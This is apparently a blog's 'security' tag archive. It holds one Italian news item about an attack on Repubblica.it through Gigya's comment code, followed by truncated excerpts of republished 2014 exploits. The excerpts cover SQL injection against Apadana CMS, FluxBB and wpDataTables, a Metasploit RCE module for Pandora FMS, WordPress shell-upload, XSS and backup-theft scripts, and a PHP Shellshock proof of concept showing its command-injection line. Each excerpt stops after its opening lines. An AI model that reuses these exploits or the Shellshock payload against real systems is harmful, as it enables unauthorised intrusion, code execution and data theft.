Tags archives: security

 

0

Siti di tutto il mondo sotto attacco hacker, c’è anche Repubblica.it

Repubblica.it e i siti dei quotidiani locali del Gruppo Espresso sono stati oggetto di un attacco hacker indiretto, attraverso parti di codice di Gigya, una società statunitense che fornisce le funzioni di commento dei lettori in tutto il mondo. Gigya probabilmente è stata presa di mira perché ha sedi anche in Israele. L’attacco è avvenuto [...]

 

0

Apadana CMS SQL Injection

[0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] [0] [0] Exploit Title : Apadana CMS Sql Injection Vulnerability [0] Exploit Author : SeRaVo.BlackHat [0] Vendor Homepage : http://www.apadanacms.ir/ [0] Google Dork : powered by apadana CMS [0] Date: 2014/November/25 [0] Tested On : windows + linux | Mozila | Havij [0] Software Link : http://www.itsecteam.com/products/havij-advanced-sql-injection/ [0] [0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0][0] [0] [0] :::::::::::::::::::::::::::::::::::::::::::::::::::::::: [0] ::: [...]

 

0

Pandora FMS SQL Injection Remote Code Execution

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require ‘msf/core’   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper   def initialize(info={}) super(update_info(info, ‘Name’ => ‘Pandora FMS SQLi Remote Code Execution’, ‘Description’ => %q{ This module attempts to exploit multiple issues in order to gain remote [...]

 

0

WordPress Html5 Mp3 Player Full Path Disclosure

WordPress – (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __ _ _______ ____ | | [...]

 

0

WordPress Sexy Squeeze Pages Cross Site Scripting

WordPress (Sexy Squeeze Pages) Plugin <= Reflected XSS Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com [~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon, PRoMaX, ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __ _ _______ ____ | | / | [...]

 

0

FluxBB 1.5.6 SQL Injection

#!/usr/bin/env python # Friday, November 21, 2014 – secthrowaway@safe-mail.net # FluxBB <= 1.5.6 SQL Injection # make sure that your IP is reachable   url = ‘http://target.tld/forum/’ user = ‘user’ # dummy account pwd = ‘test’   import urllib, sys, smtpd, asyncore, re, sha from email import message_from_string from urllib2 import Request, urlopen   ua [...]

 

0

WordPress wpDataTables 1.5.3 Shell Upload

#!/usr/bin/python # # Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability # # Vulnerability discovered by Claudio Viviani # # Date : 2014-11-22 # # Exploit written by Claudio Viviani # # Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc # # ——————————————————————– # # Issue n.1 (wpdatatables.php) # # This function is always available without wpdatatables [...]

 

0

WordPress wpDataTables 1.5.3 SQL Injection

###################### # Exploit Title : Wordpress wpDataTables 1.5.3 and below SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Software Link : http://wpdatatables.com (Premium) # Date : 2014-11-22 # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap 1.0-dev-5b2ded0 ######################   # Description [...]

 

0

WordPress WP-DB-Backup 2.2.4 Backup Theft

#!/bin/bash #Larry W. Cashdollar, @_larry0 #Will brute force and search a Wordpress target site with WP-DB-Backup v2.2.4 plugin installed for any backups done on #20141031 assumes the wordpress database is wordpress and the table prefix is wp_ #http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/ #http://thehackerblog.com/auditing-wp-db-backup-wordpress-plugin-why-using-the-database-password-for-entropy-is-a-bad-idea/ #run ./exp targetsite   DATE=”20141031″; #Date to search   if [ ! -e rainbow ]; then [...]

 

0

PHP 5.x / Bash Shellshock Proof Of Concept

<?php   // Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit // Date: 22/11/2014 // Exploit Author: ssbostan // Vendor Homepage: http://www.gnu.org/software/bash/ // Software Link: http://ftp.gnu.org/gnu/bash/ // Version: <= 4.3 // Tested on: Fedora 17, Ubuntu 8.04 // CVE: http://www.cvedetails.com/cve/CVE-2014-6271/   if(isset($_GET["cmd"]) && !empty($_GET["cmd"])) { $file=tempnam(“/tmp”, “xpl”); putenv(“PHP_XPL=() { :;}; {$_GET["cmd"]}>{$file}”); mail(“xpl@localhost”, [...]